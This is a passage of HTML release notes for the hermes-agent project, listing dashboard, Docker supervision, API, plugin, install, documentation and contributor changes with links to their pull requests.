<li>Web dashboard: migrate checkboxes to <code>@nous-research/ui</code> + design-system polish. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/28814" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28814/hovercard">#28814</a>)</li>
<li>Web dashboard: collapsible sidebar. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33421" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33421/hovercard">#33421</a>)</li>
<li>Dashboard typography &amp; contrast pass. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/28832" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28832/hovercard">#28832</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30714" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30714/hovercard">#30714</a>)</li>
<li>Skills page: lazy-fetch catalog instead of bundling 34MB into JS. (<a href="https://github.com/NousResearch/hermes-agent/pull/33809" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33809/hovercard">#33809</a>)</li>
</ul>
<hr>
<h2>🐳 Docker</h2>
<ul>
<li><strong>s6-overlay container supervision</strong> — abstract <code>ServiceManager</code> protocol (systemd/launchd/Windows/s6 backends), per-profile gateway supervision in-container, container-restart reconciliation, hadolint/shellcheck CI. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/30136" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30136/hovercard">#30136</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/31760" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31760/hovercard">#31760</a>)</li>
<li>Auto-redirect <code>gateway run</code> to supervised mode inside the s6 image. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33583" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33583/hovercard">#33583</a>)</li>
<li>Tee supervised gateway stdout to docker logs. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33621" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33621/hovercard">#33621</a>)</li>
<li>Drop <code>docker exec</code> to hermes uid before invoking the CLI. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33628" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33628/hovercard">#33628</a>)</li>
<li>Align HOME for dashboard and s6 gateway services. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dusk1e/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dusk1e">@Dusk1e</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33481" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33481/hovercard">#33481</a>)</li>
<li>Bake build-time git SHA into image so <code>hermes dump</code> reports it. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33655" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33655/hovercard">#33655</a>)</li>
<li><code>hermes update</code> prints <code>docker pull</code> guidance instead of bogus git error. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33659" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33659/hovercard">#33659</a>)</li>
<li>Upgrade Node to 22 LTS via multi-stage from <code>node:22-bookworm-slim</code>. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33060" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33060/hovercard">#33060</a>)</li>
<li>Drop <code>build-essential</code> from apt install. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33028" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33028/hovercard">#33028</a>)</li>
<li>Propagate env through s6 to cont-init and main CMD. (<a href="https://github.com/NousResearch/hermes-agent/pull/32412" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32412/hovercard">#32412</a>)</li>
<li>Targeted chown to preserve host file ownership in <code>HERMES_HOME</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/33033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33033/hovercard">#33033</a>)</li>
<li><code>mkdir HERMES_HOME</code> as root in stage2 before chown / privilege drop. (<a href="https://github.com/NousResearch/hermes-agent/pull/33078" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33078/hovercard">#33078</a>)</li>
<li>chown <code>ui-tui</code> and <code>node_modules</code> on UID remap so TUI esbuild works. (<a href="https://github.com/NousResearch/hermes-agent/pull/33045" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33045/hovercard">#33045</a>)</li>
<li>Include <code>anthropic</code>, <code>bedrock</code>, <code>azure-identity</code> extras in image. (<a href="https://github.com/NousResearch/hermes-agent/pull/30504" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30504/hovercard">#30504</a>)</li>
<li>Stop pushing per-commit SHA tags to Docker Hub. (<a href="https://github.com/NousResearch/hermes-agent/pull/29387" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29387/hovercard">#29387</a>)</li>
<li>Simplify Docker tagging — push both <code>:main</code> and <code>:latest</code> on main push. (<a href="https://github.com/NousResearch/hermes-agent/pull/33225" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33225/hovercard">#33225</a>)</li>
<li>Test slicing across GH actions jobs. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/30575" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30575/hovercard">#30575</a>)</li>
<li>Discover agent-browser Chromium binary at boot. (<a href="https://github.com/NousResearch/hermes-agent/pull/33184" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33184/hovercard">#33184</a>)</li>
</ul>
<hr>
<h2>🌐 API Server</h2>
<ul>
<li><strong>Session control API</strong> — <code>/api/sessions/*</code> (list/create/read/patch/delete/fork) + SSE-streaming chat. (salvages <a href="https://github.com/NousResearch/hermes-agent/pull/29302" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29302/hovercard">#29302</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Codename-11/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Codename-11">@Codename-11</a> + multimodal followup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Schwartz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Schwartz10">@Schwartz10</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33134" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33134/hovercard">#33134</a>)</li>
<li><code>GET /v1/skills</code> and <code>/v1/toolsets</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/33016" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33016/hovercard">#33016</a>)</li>
<li>Coerce stringified booleans in stream/store/approval payloads. (salvage <a href="https://github.com/NousResearch/hermes-agent/pull/26639" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26639/hovercard">#26639</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27293" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27293/hovercard">#27293</a>)</li>
<li>Honor <code>key_env</code> in auth-failure fallback resolution. (<a href="https://github.com/NousResearch/hermes-agent/pull/30840" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30840/hovercard">#30840</a>)</li>
</ul>
<hr>
<h2>🎟️ ACP (VS Code / Zed / JetBrains)</h2>
<ul>
<li>Session edit auto-approval modes. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/27034" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27034/hovercard">#27034</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27862" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27862/hovercard">#27862</a>)</li>
<li>Enrich Zed permission cards — command in title + <code>reject_always</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/28148" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28148/hovercard">#28148</a>)</li>
<li>Replay session history before responding to <code>session/load</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/26957" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26957/hovercard">#26957</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/26943" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26943/hovercard">#26943</a>)</li>
<li>Plugin-transformed final_response delivered through streaming gate. (<a href="https://github.com/NousResearch/hermes-agent/pull/31433" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31433/hovercard">#31433</a>)</li>
</ul>
<hr>
<h2>🔌 Plugin Surface</h2>
<ul>
<li><code>register_tts_provider()</code> plugin hook. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/30420" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30420/hovercard">#30420</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/31745" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31745/hovercard">#31745</a>)</li>
<li><code>register_transcription_provider()</code> hook + <code>stt.providers</code> command-provider registry. (salvage of <a href="https://github.com/NousResearch/hermes-agent/pull/30493" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30493/hovercard">#30493</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/31907" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31907/hovercard">#31907</a>)</li>
<li><code>register_auxiliary_task()</code> in PluginContext API. (salvage <a href="https://github.com/NousResearch/hermes-agent/pull/29817" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29817/hovercard">#29817</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/31177" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31177/hovercard">#31177</a>)</li>
<li>Bundled <code>security-guidance</code> plugin. (<a href="https://github.com/NousResearch/hermes-agent/pull/33131" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33131/hovercard">#33131</a>)</li>
<li>Discord and Mattermost migrated to bundled plugins. (<a href="https://github.com/NousResearch/hermes-agent/pull/30591" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30591/hovercard">#30591</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/31748" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31748/hovercard">#31748</a>)</li>
<li>ntfy as platform plugin. (<a href="https://github.com/NousResearch/hermes-agent/pull/30867" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30867/hovercard">#30867</a>)</li>
<li>Surface category-namespaced plugins in <code>hermes plugins list</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/27187" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27187/hovercard">#27187</a>)</li>
<li>Plugin discovery failures raised to WARNING level. (<a href="https://github.com/NousResearch/hermes-agent/pull/28318" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28318/hovercard">#28318</a>)</li>
<li><code>hermes_plugins</code> included in gateway.log component filter. (<a href="https://github.com/NousResearch/hermes-agent/pull/28313" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28313/hovercard">#28313</a>)</li>
<li>Seed plugin extras before <code>is_connected</code> gate. (<a href="https://github.com/NousResearch/hermes-agent/pull/31703" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31703/hovercard">#31703</a>)</li>
<li>Dashboard: allowlist plugin assets + denylist subprocess-influencing env vars. (<a href="https://github.com/NousResearch/hermes-agent/pull/32277" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32277/hovercard">#32277</a>)</li>
</ul>
<hr>
<h2>📦 Distribution &amp; Install</h2>
<ul>
<li>Install-method stamping + Docker detection. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27843" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27843/hovercard">#27843</a>)</li>
<li>Nix <code>#messaging</code> and <code>#full</code> package variants. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33108" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33108/hovercard">#33108</a>)</li>
<li>Pre-load messaging gateway deps via <code>--extra messaging</code>. (salvage <a href="https://github.com/NousResearch/hermes-agent/pull/26394" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26394/hovercard">#26394</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/27558" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27558/hovercard">#27558</a>)</li>
<li>Avoid piping installer directly into <code>iex</code> (Windows). (<a href="https://github.com/NousResearch/hermes-agent/pull/28347" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28347/hovercard">#28347</a>)</li>
<li>Ship bundled skills in wheel. (<a href="https://github.com/NousResearch/hermes-agent/pull/28421" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28421/hovercard">#28421</a>)</li>
<li>Ship dashboard plugin assets in wheel. (<a href="https://github.com/NousResearch/hermes-agent/pull/28406" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28406/hovercard">#28406</a>)</li>
<li>Make Camofox lazy-installed instead of eager. (<a href="https://github.com/NousResearch/hermes-agent/pull/27055" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27055/hovercard">#27055</a>)</li>
<li>Wire STT lazy-install into transcription_tools.py. (<a href="https://github.com/NousResearch/hermes-agent/pull/30256" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30256/hovercard">#30256</a>)</li>
</ul>
<hr>
<h2>🐛 Notable Bug Fixes (highlights only)</h2>
<ul>
<li>Match bare custom provider by active base URL in <code>hermes model</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/28908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28908/hovercard">#28908</a>)</li>
<li>Route <code>auxiliary.vision.provider=openai</code> to api.openai.com, skip text-only main. (<a href="https://github.com/NousResearch/hermes-agent/pull/31452" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31452/hovercard">#31452</a>)</li>
<li>Lint: skip per-file shell linter when LSP will handle the file. (<a href="https://github.com/NousResearch/hermes-agent/pull/29054" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29054/hovercard">#29054</a>)</li>
<li>Treat empty credential pool entries as unauthenticated in <code>/model</code> picker. (<a href="https://github.com/NousResearch/hermes-agent/pull/28312" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28312/hovercard">#28312</a>)</li>
<li>Reverted within window: Firecrawl integration tag, send_message @username auto-mentions, Telegram quick-command-only menus, Telegram pin-on-turn.</li>
</ul>
<hr>
<h2>🧪 Testing</h2>
<ul>
<li>Disarm lazy-install probe so <code>_HAS_FASTER_WHISPER</code> patches work. (<a href="https://github.com/NousResearch/hermes-agent/pull/30334" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30334/hovercard">#30334</a>)</li>
<li>Cover default board dashboard pin. (<a href="https://github.com/NousResearch/hermes-agent/pull/28361" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28361/hovercard">#28361</a>)</li>
<li>Cover <code>_task_dict</code> <code>task_age</code> fallback. (<a href="https://github.com/NousResearch/hermes-agent/pull/28365" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28365/hovercard">#28365</a>)</li>
<li>Allowlist <code>tmp_path</code> for <code>kanban_notify</code> artifact delivery tests. (<a href="https://github.com/NousResearch/hermes-agent/pull/30851" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30851/hovercard">#30851</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/30852" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/30852/hovercard">#30852</a>)</li>
<li>Cover null output stream terminal events in Codex. (<a href="https://github.com/NousResearch/hermes-agent/pull/33137" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33137/hovercard">#33137</a>)</li>
</ul>
<hr>
<h2>📚 Documentation</h2>
<ul>
<li><strong>30-day docs overhaul</strong> — full correctness audit, every PR in the window covered, Nous Portal weave, sidebar reorg. (<a href="https://github.com/NousResearch/hermes-agent/pull/33782" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33782/hovercard">#33782</a>)</li>
<li>Dedicated Nous Portal integration page and setup guide. (<a href="https://github.com/NousResearch/hermes-agent/pull/31296" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31296/hovercard">#31296</a>)</li>
<li>Providers: move Nous Portal first, Google Gemini OAuth last. (<a href="https://github.com/NousResearch/hermes-agent/pull/31287" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31287/hovercard">#31287</a>)</li>
<li><code>session_search</code> rewrite for single-shape tool. (<a href="https://github.com/NousResearch/hermes-agent/pull/27840" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/27840/hovercard">#27840</a>)</li>
<li>Kanban: document failure_limit, max_retries, inline create shortcuts, goals &amp; kanban settings. (<a href="https://github.com/NousResearch/hermes-agent/pull/28357" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28357/hovercard">#28357</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28358" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28358/hovercard">#28358</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28359" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28359/hovercard">#28359</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28360" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28360/hovercard">#28360</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/28362" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28362/hovercard">#28362</a>)</li>
<li>Kanban Codex lane skill. (<a href="https://github.com/NousResearch/hermes-agent/pull/28430" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/28430/hovercard">#28430</a>)</li>
<li>xAI OAuth: note X Premium+ also unlocks Grok OAuth. (<a href="https://github.com/NousResearch/hermes-agent/pull/29055" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29055/hovercard">#29055</a>)</li>
<li>Docs site: Docker audio bridge notes, "Installing more tools in the container", xurl auth HOME in Docker.</li>
<li>Email: clarify gateway vs Himalaya setup. (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/33634" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33634/hovercard">#33634</a>)</li>
<li>Auth docs: replace stale <code>hermes login</code> references with <code>hermes auth add</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/32859" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32859/hovercard">#32859</a>)</li>
</ul>
<hr>
<h2>👥 Contributors</h2>
<h3>Core</h3>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a> (lead)</li>
</ul>
<h3>Notable salvages &amp; cherry-picks</h3>
<ul>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a></strong> — s6-overlay container supervision (29 commits salvaged), Node 22 LTS upgrade, build-essential cleanup, <code>gateway run</code> auto-redirect in s6, tee supervised stdout to docker logs, <code>hermes update</code> Docker guidance, build-time SHA stamping</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a></strong> — <code>hermes gui</code> desktop launcher, <code>mouse_tracking</code> DEC mode presets</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a></strong> — Windows installer hardening, <code>--branch</code> flag for <code>hermes update</code>, install.ps1 BOM strip / commit-pin</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a></strong> — Windows <code>dep_ensure</code> bootstrap, Nix package variants (<code>.#messaging</code>, <code>.#full</code>), install-method stamping, ACP browser bootstrap consolidation</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a></strong> — <code>/update</code> slash command, dashboard checkboxes → <code>@nous-research/ui</code>, mobile dashboard polish, collapsible sidebar</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a></strong> — Nix <code>.#desktop</code> packaging, CI test slicing across GH Actions jobs, TUI clipboard copy fix</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a></strong> — doctor section banner + fail-and-issue helpers extraction, post-tag salvage cluster (curator-fallout, kanban SQLite hardening, install world-readable uv dirs, xAI bare-code paste)</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rewbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rewbs">@rewbs</a></strong> — Nous JWT inference switch + refresh-token replay fix</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Codename-11/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Codename-11">@Codename-11</a></strong> + <strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Schwartz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Schwartz10">@Schwartz10</a></strong> — session control API (REST + SSE + multimodal followup)</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Niraven/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Niraven">@Niraven</a></strong> — kanban swarm topology helper</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Interstellar-code/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Interstellar-code">@Interstellar-code</a></strong> — kanban worker visibility endpoints</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adybag14-cyber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adybag14-cyber">@adybag14-cyber</a></strong> — termux cold-start optimizations (multiple PRs)</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qike-ms/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qike-ms">@qike-ms</a></strong> — Telegram in-place status edits design</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sprmn24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sprmn24">@sprmn24</a></strong> — ntfy adapter</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jaaneek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jaaneek">@Jaaneek</a></strong> — xAI Web Search provider plugin</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yannsunn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yannsunn">@yannsunn</a></strong> — xAI upstream adapter for <code>hermes proxy</code></li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Cybourgeoisie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Cybourgeoisie">@Cybourgeoisie</a></strong> — OpenRouter sticky routing via session_id</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/memosr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/memosr">@memosr</a></strong> — Nous Portal base_url allowlist validation</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sunil123135/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sunil123135">@Sunil123135</a></strong> — Windows Docker Desktop compose file</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dusk1e/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dusk1e">@Dusk1e</a></strong> — Docker HOME alignment for dashboard + s6 gateway services</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/beardthelion/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/beardthelion">@beardthelion</a></strong> — opencode-go anthropic_messages routing</li>
